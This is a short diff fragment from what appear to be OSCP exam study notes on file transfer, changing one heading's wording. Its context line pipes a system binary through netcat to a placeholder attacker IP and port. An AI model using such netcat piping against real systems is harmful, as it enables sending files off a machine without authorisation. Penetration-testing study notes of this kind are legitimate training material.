tedchen0001/OSCP-Notes/FileTransfer.md

 cat /usr/bin/which | nc <attacker ip> <attacker port>
 ```

-Check if the file is correct
+Checking if the file is correct

 attacker